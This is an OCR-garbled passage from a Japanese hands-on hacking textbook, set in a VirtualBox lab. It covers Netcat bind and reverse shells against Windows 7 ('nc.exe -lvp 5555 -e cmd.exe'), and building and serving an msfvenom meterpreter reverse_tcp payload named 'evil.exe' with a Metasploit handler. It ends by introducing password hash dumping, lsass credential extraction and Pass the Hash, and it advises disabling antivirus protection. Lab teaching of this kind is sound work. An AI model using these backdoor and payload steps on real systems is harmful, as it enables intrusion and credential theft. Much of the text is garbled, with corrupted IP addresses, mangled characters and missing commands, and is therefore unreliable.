keyboards] ボタ ン を 押し ます 。| Default input language」 を |Tapanese (apan) 
- Microsoft IME」 に 変更 し て 、[OK] ボタ ン を 押し ます ( 図 4-11) 。 


Gee umarBs ermceskwsemm 
Du ID ば aruaO 
昌和 


ln slcd scmn こ CS 
Sgcr hc scrmccS hi YOd Wnnrtforcochirpr ngunoc own in He le 
La he Ak 避 ard Femnwe burtcnm Io mcdy hg 回 








図 4.11 デフ ォ ル ト の 入力 言語 を 変更 する 


Sysinternals Suite を イン スト ー ル する 

実験 の 検証 の た め に Windows 7 に Sysinternals Suite を イン スト ー ル し た い の で 
す が 、 この 仮想 マシ ン は イン ター ネッ ト に 接続 され て いま せん 。 そこ で 、 ホ スト OS 
側 で Sysinternals Suite を ダウ ン ロ ー ド し ます (ファ イル 名 は SysinternalsSuite. 
ZiD )。 


SYsinternals Suite 


https://technet.microsoft.com/ja-jP/sysinternals/bb842062 





その 後 、 仮想 マシ ン の メニ ュー の 「 デ バイ ス 」 > 「 ド ラッ グ 和 ドロ ッ プ 」 >「 双 
方 向 ] を 選び ます 。 こ れ で ファ イル を コピ ビー で きる 准 備 が で きた の で 、 ホ スト OS 
の SysinternalsSuite-ziDp ファ イル を ゲス ト OS に ドラ ッ グ 層 ド ロッ プ し ます 。 

ゲス ト OS で ある Windows 7 に コピ ビー し た ら 、"SysinternalsSuite.ziDp ファ イル 
を 右 ク リッ ク し て |Extract all」 で 展開 し ます 。 展開 す る 場所 は 任意 で す が 、 ここ 
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で は デス クト ッ プ 上 (C:\Users\IEUser\Desktop\SysinternalsSuite ) に し て お 
きま す 。 

SysinternalsSuite フォ ル ダ ー 内 の "Autoruns.exe'"(32 ビ ッ ト 用 ) を 起動 し ます 。 
起動 時 に シス テム の 各 項 目 を 取得 する の で 、 和 完全 に 表示 され る まで 数 秒 か か り ま 
す 。「Everything] タブ に 自動 起動 に 関す る 項目 が 表示 され ます 。 

実験 後に 自動 起動 の 項目 に 何 が 登録 され た の か を 確認 する た め に 、 初 期 状態 の 
項目 を 保存 し て お きま す 。 こ れ が ベー スラ イン に な り ま す 。 メニュー の 「File」 > 
「Save」 を 選び 、"Autoruns_Baseline_20180726.arn'( 未 尾 は 年 月 日 ) の よう な ファ 
イル 名 で 保存 し ます 。 実験 後に 保存 し た ファ イル と の 差分 を 調べ る こと で 、 登 録 
され た 項目 を 突き 止め られ ます 。 


効 Netcat で シェ ル の 基本 を 習得 する 

Netcat は 、 ネ ットワーク を 介し て デー タ を 送受 信 す る ツー ル で 、 ネ ットワーク 
を 扱う 万 能 ツ ー ル と し て も 知ら れ て いま す 。Linux 版 と Windows 版 が あり ます 。 
オプ ショ ン 次 第 で クラ イア ント や サー バー に も な れ ま す 。 


The GNU Netcat project 
http://netcat.sourceforge.net/ 


Netcat for Windows 
https://joncraton.org/blog/46/netcat-for-windows/ 


ここ で は 、Netcat を 使っ た 基本 的 な 通信 を 解説 し ます 。 そ れ か ら 、Netcat を 用 
いた バッ ク ド ア の 構築 法 を 紹介 し ます 。 バ ッ ク ド ア と は 、 侵 入 を 容易 に する 裏口 
の こと で す 。 ターゲット 端末 を 掌握 し た 後に 、 後 の 侵入 に 備え て バッ ク ド ア を 設 
置 し ます 。 玉 点 を 毎回 攻略 する 必要 が な く な る の で 、 侵 入 が 容易 に な り ま す 。 


休 Netcat の 実験 の 準備 
Kali と Windows 7 の 仮想 マシ ン を 立ち 上 げ て 、 ホ スト オン リー ネッ トワ リー ク で 
つなが っ て いる も の と し ます 。 こ の 実験 に お ける 環境 は 、 次 の 通り で す 。 





228 | 第 2 部 | ハッ キン グ を 体験 する 


Kali (攻撃 端末 ) 
アダ プター1 
割り 当て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.2 ( 静 的 ) 


Windows 7 (ター ゲッ ト 上 端末 ) 
アダ プター1 
割り 当て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.102 ( 動 的 ) 





Windows 7 の 仮想 LAN ア ダ プ ター で は ホス ト オ ン リー アダ プター を 割り 当て 、 
OS 側 で 動 的 に IP アド レス を 取得 し ます 。 そ の た め 、 読 者 の 環境 に よっ て は IP ア 
ドレ ス が 何 う の で 、 適 官 読み 換 えて くだ さい 。 


@ Netcat に よる 通常 シェ ル 


①Windows に Netcat を イン スト ー ル する 

Kalii に は Netcatl が デフ ォ ル ト で イン スト ー ル され て いま す が 、Windows に は イ 
ンス トー ル さ れ て いま せん 。 そこ で 、 次 の URL か ら Netcat を ダウ ン ロ ー ド し ま 
す 。 ア ンチ ウイ ルス に よっ て ウイ ルス と 誤認 され る 芝 れ が ある の で 、 リ アル タイ 
ム 保 護 を 無効 に し て ダウ ン ロ ー ド し ます 。 こ こ で は 、mc1l11nt.zip ファ イル を 用 
いま す 。 


Netcat for Windows 


https://joncraton.org/blog/46/netcat-for-windows/ 





パス ワー ド (me ) を 入力 し て 展開 し ます 。 展開 され た フォ ル ダ ー を 、"C:\ ま Work" 
配下 に 移動 し まし た 。 コ マン ド プ ロン プ ト で 次 を 入力 し 、Netcat が 起動 する こと 
を 確認 し ます 。 


C:\Users\TEUser>cd C:\Mork\nc111nt 


C:\Mork\nc111nt>nc.exe -h 
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(② ホー ト 5555 で 接続 を 待ち 受け る 
コマ ンド プロ ンプ ト で 次 の よう に 入力 し ます 。 ポ ボー ト 5555 で 待ち 受け る サー 
バー に な り ま す 。 
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-1 : 待ち 受け 状態 に する 。 
-y : 冗長 モー ド 。 表 示 内 容 が 増え る 。 
人 ・ ボー ト 番 号 。 


する と 、 Windows Firewall が 起動 し て 、 通信 を 許可 する か どう か 聞い て きま す 。 
ここ で は 、 両 方 に チェ ッ ク を 人 人 れ て 、[ Allow access] ボタ ン を 押し ます ( 図 4-12)。 


Windows Firewall has DIpcred some 全 athjres of nC.exe on コ | Pic and Drnvate nethuCrts. 


Nermc: INC, ど と X き 
PLHWShef: Unkmowm 
Path: C: テ work\nc111nEFnc.=x= 


&low nc.cxc tb communicatc on hcsc nctworks: 


| 尻 Privatc nctworks, such cs my home or work rctworli 


PL_Dic nshworikc, su 中 a= tnOse i コ FDOT 世 and CoTfse shops (POt reconm ロ = ロ 
pecauze heee networks often have 民 e cr no seourtt/) 





図 4.12 Netcat の 通信 の 許可 


絢 の コマ ンド プロ ンプ ト を 起動 し て 、 netstat コマ ンド を 用 いる と 、 待 ち 受 け 状 
態 に な っ て いる こと が わか り ま す 。 


C:\Users\TEUser>netsta† -an 


Active Connections 


Proto Local Address Fore1gn Address State 
( 略 ) 
TCP 9.9.9.9:5555 9.9.9.9:9 LTSITENING 


( 略 ) ポー ト 5555 の 行 が ある 。 


-a: すべ て の 接続 を 表示 する 。 
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-n : 名 前 解決 (fP アドレス か ら ド メイ ン 名 へ の 変換 ) し な い 。 サ ービス 名 解決 
(ポー ト 番 号 か ら サ ービス 名 へ の 変換 ) を し な い 。 


netstat コマンド の 出力 は 、 表 4.1 の よう な 書式 に な っ て いま す 。 


表 4-1 netstat コ マン ド の 出力 の 書式 


1 |Proto " | プロ トコ ル 種 別 。TCP、UDP、RAW な ど 。 
|2 |LocalAddress | 接続 元 (ロー カル ) の IP アド レス と ポー ト 番 号 (ポー ト 名 )。 





|3 。 | ForeignAddress | 接続 先端 末 の IP アド レス (ホス ト 名 ) と ポー ト 番 号 (ポー ト 名 )。 


4 |Stete | 現 存 の 状態 。。 oo 55656〈《〈666 


State が LISTENING な の で 、 ポ ー ト 5555 (TCP) で 接続 を 待ち 受け て いる 状態 
で す 。 


3③)Netcat で Windows に 接続 する 
Kali で Terminal を 起動 し て 、 次 の よう に 入力 し ます 。 こ れ に より 、Netcat は ク 
ライ アン ト と し て 動作 し て 、Windows に 接続 し ます 。 





する と 、 Windows 側 で 先ほど の "IiStening on [any] 5555 …" 以降 に 、 次 の よう に 
表示 され ます 。 





再び netstat コ マン ド を 実行 する と 、Foreign Address に Kali の IP アド レス と 
ポート 番 号 が 表示 され ます 。 そ し て 、State は ESTABLISHED に な り ま す 。 
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④)Kali 側 と Windows 側 で デー タ を や り と り で きる こと を 確認 する 

Kali 側 で "hello" と 入力 する と 、Windows 側 に "hello'" と 表示 され ます 。 逆 に 、 
Windows 側 で "hello!' と 入力 する と 、Kalji 側 に "hello! と 表示 され ます 。 あ た か も 
チャ ッ ト し て いる よう な 状況 に な り ま す 。 


Kali の Termina1 


りこ ちら か ら 入 力 


(④ 表 示さ れる 





Mindows 7 の コマ ンド プロ ンプ ト 





Kali 側 で [Ctrl] + [c] キー を 入力 し て 強制 終了 する と 、 ど ちら の Netcat も 終 
了 し ます 。 

以上 に より 、Netcat サ ー バ ー (Windows 側 ) と Netcat ク ライ アン ト (Kali 側 ) 
で 相互 に デー タ を や り 取 り で きる こと が わか り ま す 。 
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@ Netcat に よる バイ ンド シェ ル 

以上 を 応用 し て 、Windows 7 の コマ ンド プロ ンプ ト を Kali か ら 操 作 で きま す 。 
この よう に 、 攻 撃 端 末 か ら タ ー ゲ ッ ト 端 末 に 接続 する タイ プ の シェ ル を バイ ンド 
シェ ル (bind shel) と いい ます 。 こ こ で いう シェ ル と は 、 ユ ー ザ ー が 入力 し た コ 
マン ド を 読み 取り 、 そ れ を 解釈 し て カー ネル に 伝え る プロ グラ ム の こと で す 。 


① Windows の シェ ル を 指定 する 

Windows で Netcat を サー バー と し て 動作 させ る と き に 、-e オ プシ ョ ン を 使い ま 
す 。-e オ プシ ョ ン に 接続 後に 実行 する プロ グラ ム を 指定 し ます 。Netcat の 標準 入 
出力 は 、 こ の プロ グラ ム に リダイレクト され ます 。 つ まり 、 シ ェ ル を 指定 すれ ば 、 
クラ イア ント か ら サ ー バ ー を 遠隔 操作 で きま す ("7)。 こ こ で は 、Windows の シェ 
ル で ある "cmdL.exe" を 指定 し ます 。 


C:\Mork\nc111nt>nc .exe -l1vp 5555 -e cmd.exe 
1istennng on [any] 5555 ... 


(待ち 状態 に な る ) 


②Kali か ら Netcat クラ イア ント で アク セス する 
Kali か ら は Netcat クラ イア ント で 通常 通り に アク セス し ます 。 


Foot 同 kKa11i:<# nc 19.9.9.192 5555 


3 遠隔 操作 で コマ ンド を 実行 する 

する と 、 コ マン ド プ ロン プ ト の 起動 時 の 表示 内 容 が Kali 側 の Terminal に 表示 さ 
れ ま す 。 プ ロン プ ト が 表示 され る の で 、 コ マン ド を 実行 し ます 。 入力 し た コマ ン 
ド が その まま エコ ー さ れ て 表示 され ます が 、 そ の 後に コマ ンド の 出力 結果 が 表示 
され ます ( 図 4-13) 。 


7: ター ゲッ ト 端 末 が Linux で あれ ば 、-e オ プシ ョ ン に "/bin/bash" を 指定 し ます 。 
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rtelak- Ye まく と ルン レン 4p し 当ら 


Seaich 「enminal Hep ーー ーー 






File Edit View 





ーーーー プ ロン プ トド ト に コマ ンド を 
1 の rdhT 


し ーー ュー キ 


た ニン と マリ に ンス に p』 = ピア 
2 06 5 人 50 を 実行 し て いる の と 同じ 状況 で す 。 つ 
283 9eneric.! まり 、 ーー ュー ユ 


Sn の 


まま まま うす 





4-13 Netcat で 遠隔 操作 


4 遠隔 操作 を 終了 する 

終了 する 場合 に は 、Kali 側 で exit コ マン ド を 実行 し ます 。 同時 に 両者 の Netcat 
が 終了 し ます 
免 リバ ー ス シェ ル と は 

バイ ンド シェ ル で は 、 攻 撃 端末 か ら タ ー ゲ ッ ト 端 末 に 対し て 接続 し て 、 遠 隔 探 
f 必 を 実現 し て いま し た 。 これ だ と 通信 路 の 途中 に ファ イア ウォ ー ル や ルー ター な 
ど が 存在 する と 、 プ ロッ ク さ れ て し まう こと が よく あり ます ("8)。 イ ン バ ウ ンド 
(外部 か ら 内 部 へ の アク セス ) を 制限 し て いる た めで す 。 遠隔 操作 を 実現 する バッ 
ク ド ア を せっ か く 設 置 で き て も 、 ア クセ ス で き な い の で は 意味 が あり ませ ん 。 

この 癌 題 を 解決 する 方 法 に 、 リ バー スシ ェ ル (reverse shell) を 用 いる 方 法 が あ 
りり ます 。 リ バー スシ ェ PE ター ゲッ ト 端 末 か ら 攻 撃 端 末 に 対し て 接続 する タ 
イプ の シェ ル で す 。 つ まり 、 先 ほど の 実験 と は 逆 の 接続 を し ます ( 図 4-14)。 フ ァ 


8: ルー ター が ポー ト フ ォ ワ リーディング や DMZ の 設定 を し て いな けれ ば 、 外 部 か ら 内 部 へ の ター 


W 
デ が かー ゴー ドー デ ノ ち } ょ 。 ーー Aa > チ 
。 ト \ 親 ww ミュー が コ し ハハ ko Is だ た : < uu - 電 ょ " 
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イア ウォ ー ル や ルー ター は アウ トバ ウン ド (内 部 か ら 外 部 へ の アク セス ) が ゆる 
く 、 リ バー スシ ェ ル の 通信 は プロ ッ ク さ れ な いこ と が 多い と いえ ます 。 






10.0.0.102 10.0.0.2 
windows7 POWS559 Kali 
(ター ゲッ ト 上 端末 ) “ (攻撃 端末 ) 
バイ ンド シェ ル の 場合 


リバ パー スシ ェ ル の 場合 





Windows 7 port に 995 
(ター ゲッ ト 端 末 ) 






図 44.14 パイ ンド シェ ル と リバ ー ス シェ ル の 比較 


代 Netcat に よる リバ ー ス シェ ル 
Netcat で リバ ー ス シェ ル を 実現 する 方 法 を 紹介 し ます 。 


① ホ ー ト 番号 を 指定 する 


Kali (攻撃 端末 ) で 、 次 の よう に ポー ト 番 号 を 指定 し て 、 接 続 を 待ち 受け ます 。 
バイ ンド シェ ル と は 違い 、 攻 撃 端 末 が 待ち 受け て いま す 。 





② Windows 7 を 遠隔 操作 する 
Windows 7 (ター ゲッ ト 端 末 ) で 、 次 の コマ ンド を 実行 し ます 。 
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Kalii で は 、"listening on [any] 5555 .…" に 続い て 次 の よう な 反応 が あり ます 。 


ーー 『 こ コト 
」 
(マコ ロコ AF 填 


で 人 < し で | 6 ー ここ 
ご た ーー 1 ーー ジュ 」 
だ リリ V コ ゴ だ / バ 





コマ ンド プロ ンプ ト が 表示 され まし た 。 こ れ で Windows 7 を 制御 で きま す 。 い 
くつ か コマ ンド を 入力 し て み ま し た 。 い ずれ る Windows 7 上 で コマ ンド を 実行 し 
た 結果 と 同じ で す 。 

nt>ipconfig ー 匠 EZ 


ーー りみ (た る の と キヤ ル に Y 6 ちよ マー Pr の こく 


頭 以降 が コマ ンド の 実行 結果 の 出力 
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C:\Mork\nc111nt>whoami 
whoami 
ie8w1in7\1euser 


3 遠隔 操作 を 終了 する 
終了 する と き は Kali 側 で exit コ マン ド を 入力 し ます 。 


光 初め て の Metasploit Framework 


Metasploit Framework (Metasploit と 略す ) と は 、 ハ ッ キ ング に 特 化 し た 総合 
ツー ル で す 。 調査 、 侵 和信 、 攻 撃 、 バ ッ ク ド ア の 設置 ・ 接 続 と いう 、 サ ー バ ー 侵 入 
に お ける 一 連 の 攻撃 を サポ ー ト し ます 。 実践 で 使わ れる 場面 は 少な いと いえ ます 
が 、 学 習 目 的 の た め に 本 書 で は Metasploit を 積極 的 に 利用 し て いき ます 。 

ここ で の 実験 の 環境 は 、 次 の 通り で す 。 


Kali (攻撃 端末 ) 


アダ プター1 (必須 ) 
者 り 当 て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.2 ( 静 的 ) 


アダ プター2 (任意 ) 


割り 当て : NAT 
IP アド レス : 10.0.3.15 ( 動 的 ) 
Windows 7 (ター ゲッ ト 上 端末 ) 
アダ プター 人 1 
者 り 当 て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.102 ( 動 的 ) 





で リバ ー ス シェ ル に よる Windows 7 の 遠隔 操作 


不正 な プロ グラ ム を 通じ て Kali か ら Windows 7 を 遠隔 操作 する 方 法 を 紹介 し ま 
す 。「Windows 7 の 仮想 マシ ン の 画面 」 と |Kali の 仮想 マシ ン の 画面 」 を 並べ て 表 
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示し て お く と タイ ミン グ を 確認 し や すい で し ょ う 。 


①)Metasploit を 起動 する 
Kali に は Metasploit が イン スト ー ル され て お り 、Terminal で 次 の よう に 入力 す 
る だ け で 起動 で きま す ("9)。 





「msf >] と いう プロ ンプ ト が 返っ て きた ら 、 起 動 に 成功 し て いま す 。Metasploit 
の 操作 は 、 こ の プロ ンプ ト 上 で 行い ます 。 msf コ ン ソ ー ル と 呼ば れる こと も あり ま 
す が 、 本 書 で は msf プ ロン プ ト と 呼ぶ こと に し ます 。 

初め て の Metasploit な の で 、 ま ず は 基本 的 な 使い 方 を 紹介 し ます 。 何 度 か 
banner コ マン ド を 入力 し て みて くだ さい 。 起動 時 の アス キー アー ト の バナ ー が ラ 
ンダ ム に 表示 され ます ( 図 4-15) 。 





9: か つて は 適宜 msfnpdate コ マン ド で アッ プ デ ー ト する 必要 が あり まし た が 、 現 在 の 
Metasploit で は msfupdate コマ ンド を 用 いま せん 。 代わ り に 、apt upgrade コマ ンド を 実行 する こ 
と で 、Metasploit も 含め て アッ プ デ ー ト され ます 。 
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ms† > banner 


=| EtaSDL01 
ー=[ 1780 expl 
=| 538 paytoads 41 encoders 
-=| Free MetaspLo1t Pro tr1aL: 


図 4.15 パナ ー 表 示 
yz ー * 。 立 7 本 ーー - e ーー 
伏 に 、show コマ ンド を 緒 介 し ます 。show -h コ マン ド 
式 を 含む も ) が 表示 され ます 


ms 和 † > show -h 





Oo1ts - 1016 aux1Liary - 30B post 


16 nopS 
http://r-7.co/trymsp 


ML 


一 \ 


を 人 力 す み 


[*] Valid parameters for the "show” command are: al11、。 | 


encoders ,。 noODSs 。 explo1ts, payloads , aux111ary 。 DLuE1ns , 


1nfTo,。 opt1ons 


[*] Additiona] module-spec1†1c parameters are: m1SS1nE , 


advanced , evas1on , targets , act1ons 


す ーー う 


ヘル プ の 内 容 に よる と 、'exploits や "encoders な ど を 指定 で きる こと が わか 
り ま す 。 こ こ で は 、show exploits コマ ンド を 入力 し て み ま す 。 す る と 、Metasploit 

使用 で きる Exploit が 列挙 され ます 。 Exploit と は 、 脆 性 を 突く 攻撃 プロ グラ ム 
の の だ で ま 


ms† > show explo+ て ts 
( 略 ) 
Mindows/winrm/w1inPWW SCr1Dt exXec 
manua1 MinRM Script Exec Remote Code Execution 
Mindows/wins/ms94 945 wins 


great 
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2912 -11 -91.」 


2094-12 -14。」 


MS94-945 Microsoft MINS Service Memory Overwrite 
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Exploit に は ラン ク が 割り 当て られ て お り 、 出 力 結 果 の 3 列 目 に 表示 され ます 。 
[manual < く low く average く normal く good く great < く excellent」 の 順 で エレ ガン 
ト な も の と な り ま す (excellent が 最も 好ま し い )。 例 えば 、 excellent は 、 シ ステ ム 
を クラ ッシュ させ る こと な く 任 意 の コマ ンド を 実行 で きま す (*10) 。 どれ を 使用 す 
る か 迷っ た 場合 に は 参考 に する と よい で し ょ う 。 

最後 に search コ マン ド を 紹介 し ます 。Metasploit に 含ま れ て いる モジ ュー ル を 
実行 する に は 、 パ ス の 形式 で 指定 し な けれ ば な り ま せん (ディ レク トリ の パス で 
は な く 、 分類 上 の パス )。search コ マン ド を 用 いる と 、 目 的 の モジ ュー ル の パス を 
検索 で きま す 。 

例え ば 、 「Windows 向 け ]」 か つ 「TCP 型 の リバ ー ス シェ ル 」 か つ 「 ペ イロ ー ド 」 
の モジ ュー ル を 検索 する 場合 に は 、 次 の よう に 入力 し ます 。 





*10 : https//github.com/rapid7/metasploit-iramework/wik/Exploit-Ranking 
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② ペイ ロード を 作成 する 

それ で は ペイ ロー ド を 作成 し ます 。 こ こ で いう ペイ ロー ド と は 、 悪 意 の ある 動 
作 を する 実行 コー ド の こと で す 。 本書 で は (実行 コー ド の 意味 で の ) ペイ ロー ド 
か ら 生 成 し た 実行 プ ゴ ログ ラム も ペイ ロー ド と 表現 する こと に し ます 。 ペイロード 
の 種類 に も より ます が 、 一 般 に は ター ゲッ ト 上 端末 で 実行 され る こと を 想定 し て い 
ます 。 今回 作成 する ペイ ロー ド は 、TCP 型 の り リバ ー ス シェ ル で す 。 こ の ペイ ロー 
ド が ター ゲッ ト 端 末 (ここ で は Windows 7) で 実行 され る と 、Kalii か ら タ ー ゲ ッ 
ト 端 末 を 制御 で きま す 。 

ペイ ロー ド を 作成 する に は 、msfvenom コ マン ド を 用 いま す (11)。 通常 、 
Terminal 上 で 実行 し ます が 、msf プ ロン プ ト 上 で も Linux コマ ンド を 実行 で きま 
す 。 こ こ で は msf プ ロン プ ト 上 で 、 次 の よう に 実行 し ます 。 





-p ・ ペイ ロー ド の パス 。 

-f : 出力 ファ イル の 形式 。 

-o : 出力 ファ イル の パス 。 

LHOST : ペイ ロー ド の オプ ショ ン の 1 つ 。 接続 先 を 指定 する 。 


*11 : veiLevasion と いう ツー ル で も 、 ペイ ロー ド を 生成 で きま す 。 た だ 、 msfvenom で の ペイ ロー 
ド の パス 」 と 「Metasploit で の ペイ ロー ド の パス 」| が 紐 付 く の で 、 ハ ンド ラー を 設定 する と き に 
わか りや すい と いえ ます 。 
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ここ で は 、Kali の IP アド レス を 指定 し ます 。 こ の IP アド レス は ペイ ロー ド が 実 
行 さ れ た と き に 、 タ ー ゲ ッ ト 上 端末 が アク セス する た め に 用 いら れ ま す 。 つ まり 、 
Kalii の IP アド レス 1000.2 を 指定 し ます 。 

コマ ンド の 実行 結果 と し て 、 デ スク トッ プ ("root/Desktop") に "evilexe" ファ 
イル が 出力 され ます 。 


③ 外 部 か ら ベ イロ ー ド に アク セス で きる よう に する 
別 の Terminal を 起動 し て 、 次 を 実行 し ます 。 結果 と し て 、/var/www/html/ 
share ディ レク トリ に "evilexe" ファ イル が 配置 され ます 。 





Apache を 起動 し て 、 外 部 か ら "evilexe"” ファ イル に アク セス で きる よう に し ま 
す 。 





④Windows の ブラ ウザ か ら ペ イロ ー ド に アク セス する 
Windows 側 で プラ ウザ を 起動 し て 、http://10.0.0.2/share に アク セス し ます 。 
"evilexe ファ イル が 見 える は ず で す ( 図 4-16)。 
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ア 


| 巡 Favortes | 計 Suggested Sites ・ ] Web Slice Gallery * 


Namne Last modified Sgze Descriptiom 


201S-07-26 21.31 72 人 KK 





図 44.16 ブラ ウザ で の アク セス 


(5 リバース シェ ル を 待ち 受け る 

Kali 側 の msf プロ ンプ ト に て 、 ハ ンド ラー モジ ュー ル を 使い ます 。 この モジ ュー 
ル は 、 バ イン ド シ ェ ル で ター ゲッ ト 端 末 に 接続 し た り 、 リ バー スシ ェ ル か ら の 接 
続 を 待ち 受け た りす る の に 用 いら れ ま す 。 こ こ で は 、 payload に リバ ー ス シェ ル で 
ある windows/meterpreter/reverse_tcp を 指定 し ます 。 そ の た め 、exploit コマ 
ンド で 実行 する と 、 リ バー スシ ェ ル か ら の 接続 の 待ち 状態 に な り ま す 。 


mmS 和 † > usSe exDl1Oit/multi/hand1er 

msf exp1oit(mu1ti/hand1er) > set payl1oad windows/meterpreter/.」 
Feverse tcp 

payload => windows/meterpreter/reverse_ tcp 

ms 和 f exp1oit(multi/handler) > set LHOST 19.9.9.2 で 5【 り )( アメ コア ン 
LHOST => 19.9.9.2 

msf exp1oit(multi/handler) > show options 設定 され て いる オプ ショ ン を 確認 。 








Module options (exploit/multi/handler ) : 
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"evilexe'" ファ イル の 作成 時 に 接続 ポー ト を 指定 し な か っ た の で 、 デ フォ ルト の 
ポー ト 4444 に 接続 し よう と し ます 。 よ っ て 、Kali で の 待ち 受け ポー ト は デフ ォ ル 
ト の ポー ト 4444 の まま に し ます 。 

待ち 受け プロ グラ ム で ある ハン ドラ ー を 設定 し 終え た ら 、exploit コ マン ド ( あ 
る い は run コマ ンド ) で 実行 し ます 。 ここ で は シン プル に 引数 な し で 実行 し まし た 
239。 


*12 : 初め て の Metasploit の 拘 作 で ある た め 、 こ こ で は msf プ ロン プ ト が 返ら な いよ うに し まし 
た 。 後 で 、 パ バック グラ ウン ド で 待ち 受け る 方 法 を 紹介 し ます (4.2 の 「Windows 10 を Metasploit 
で 攻撃 する 」 を 参照 )。 
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ms 千 exploi て (mult ュ 1/handler) > exploit 


[|*] Started reverse TCP handler on 19.9.9.2:4444 
(待ち 状態 に な る ) 


6 ベイ ロー ド を 実行 する 

Windows 側 で "evilexe"” ファ イル を デス クト ッ プ に ダウ ン ロ ー ド し ます 。 "evil 
exe ファ イル を ダブ ルク リッ ク し て くだ さい ("13)。 す る と 、 何 も 起こ ら な いよ 
うに 見 えま す が 、 裏 で ペイ ロー ド が 実行 され て いま す 。 そ の 証拠 に 、Kali 側 の 


Terminal を 確認 し て くだ さい 。 


mmS 千 expl1oit(mul1ti/hand1er) > exp1oit 


[*] Started reverse TCP handler on 19.9.9.2:4444 
[*] Sending stage (179779 bytes) to 19.9.9.192 
[*] Meterpreter session 1 opened (19.9.9.2:4444 -> 
19.9.9.192 : 49166 ) at 2918-97-26 21:59:99 +9999 





この 行 以降 が 新しい 表示 。 








meterpreter > Meterpreter の プロ ンプ ト が 表示 され た 。 


meterpreter >| と いう プロ ンプ ト が 表示 され て いま す 。 そ の 上 の メッ セー ジ 
を 見 る と 、 Meterpreter の セッ ショ ン が 確立 し た こと が わか り ま す 。 本 書 で は 、 こ 
の プロ ンプ ト を Meterpreter プロ ンプ ト と 呼 選 こと に し ます 。 


7 セッション が 確立 され て いる こと を 確認 する 
Windows 側 で コマ ンド プロ ンプ ト を 起動 し て 、 次 の よう に 入力 し ます 。 


*13 : ここ で は reveser_ tcp に よる 制御 の 例 で ある た め 、 自 ら "evilexe ファ イル を 実行 し まし た 。 


実際 の ハッ キン グ で は 、 何 ら か の 方 法 で ター ゲッ ト に ペイ ロー ド を 実行 きせ な けれ ば なり ま せ 
ん 。 ま た 、 ア ンチ ウイ ルス に よっ て プロ ッ ク さ れる 可能 性 も 相 定 し な けれ ば な り ま せん 。 
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C:\Users\TEUser>netstat -n | find "ESTABLTSHED" 
TCP 19.9.9.192 : 49157 19.9.9.2:4444 ESTABLTISHED 


この 出力 の 意味 は | ロー カル 端末 の 10.0.0.102 (ボー ト 49157) と リモ ー ト 端末 の 
1000.2 (ボー ト 4444) に て 、 セ モッ ショ ン が 確立 済み (established)」 と いう こと で 
に 


⑧Windows 7 の 遠隔 操作 を 開始 する 

Kali 側 の Meterpreter プロ ンプ ト に 戻り ます 。 こ こ か ら は 実際 に 、 こ の プロ ンプ 
ト を 通じ て 、Windows 7 を 遠隔 操作 し ます 。 

まず は 、 探 索 方 法 を 紹介 し ます 。Meterpreter プロ ンプ ト で の 操 作 な の で 、 
Meterpreter の コマ ンド を 用 いま す 。 コ マン ド プ ロン プ ト の コマ ンド で は な いこ 
と に 注意 し て くだ さい 。 help コマ ンド を 実行 する と 使用 で きる コマ ンド が 列挙 さ 
れ ま す 。 pwd コマ ンド 、 ls コマ ンド 、cd コマ ンド と いっ た だ た 、 Linux コマ ンド と 同じ 
も の が いく つか 用 意 き れ て いる こと を 確認 で きま す 。 


meterpreter > Dwd 

C:\Users\TEUser\Desktop 

meterpreter > cd .. 
meterpreter > cd Desktop 


meterpreter > 1s 
Listing: C:\Users\TEUser\Desktop 


Mode Size Type Last modified Name 
49777/rwxrwxrwX 49969 dir 2918-97-26 22:33:34 +9999 
SysinternalsSuite 

199666/rw-rw-Pw- 282 fi] 2918-97-25 22:46:34 +9999 desktop . ini 
199666/rw-rw-Pw- 826 fi] 2915-99-21 18:19:49 +9999 eula.1nk 
199777/rwxrwxrwX 73892 和 fi] 2918-97-26 21:56:53 +9999 evil .exe 





ダウ ン ロ ー ド し た ペイ ロー ド が ある 。 
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⑨) Windows の パス ワー ド ハ ッ シュ を 入手 する 
Windows の パス ワー ド 解 析 に は 、 い くつ か の 代表 的 な アプ ロー チ が あり ます 。 


① パ スワ ー ド ハッ シュ を 入手 し て 、 パ スワ リー ド 解 析 に よっ て 、 元 の パス ワー ド を 
特定 する 。 

② lsass.exe プロ モス か ら 平 文 の ログ オン 情報 を 取得 する 。 

③ パ スワ ー ド ハッ シュ を 入手 し て 、 タ ー ゲ ッ ト に 送信 し て ログ オン する 。 


① の アプ ロー チ は 、 パ スワ ー ド 解析 に お いて 最も 基本 と な る 方 法 で す 。 パ ス 
ワー ド ハ ッ シュ の 取得 に は 様々 な 方 法 が あり ます が 、 解 析 の 流れ と し て は 同じ に 
な り ま す 。 

② の アプ ロー チ は 、 メ モリ ー 上 で は パス ワー ド が 平文 の 状態 で 存在 する と いう 
仕様 を 逆手 に 取っ た 攻撃 方 潜 で す 。Pwdump や Gsecdump と いっ た 専用 ツー ル で 
読み 取れ ます 。 

③ の アプ ロー チ は 、Windows の ネッ トワ ー ク ログ オン (SMB 共 有 経 由 で の 認 
証 ) の 仕様 を 逆手 に 取っ た 攻撃 方 法 で す 。 こ の 攻撃 を Pass the Hash と いい ます 。 
特に 、AD (ActiveDirectory) 管理 下 で は 、 ロ グ オ ン す る た め に ネッ トワ ー ク で 認 
証 デ ー タ を や り 取 り し ます 。 パ スワ ー ド ハッ シュ を 取得 済み で あれ ば 認証 デー タ 
を 偽造 で きる た め 、 この 攻撃 を 実現 で きる わけ で す 。 AD 管理 下 の す べ て の 端末 が 
攻撃 対象 に な り ま す 。 

ここ で は 、 最 も 基本 的 な の の ア プロ ー チ を 採用 し ます 。 こ の ステ ッ プ で は 、 パ 
スワ ー ド ハッ シュ を ダン プ す る こと を 目標 に し ます 。 そ し て 、 次 の ステ ッ プ で は 、 
パス ワー ド ハ ッ シュ を 解析 する こと を 目標 に し ます 。 

Windows で は ログ オン 認証 を 管理 し て いま す 。 ロ ー カ ル ア カ ウン ト で あれ ば 
SAM デー タベース (C:\Windows\System32\config\SAM" ファ イル )、 ド メイ 
ン ア カウ ント で あれ ば AD 上 の デー タベース (C\Windows\NTDS\ntds.dit 
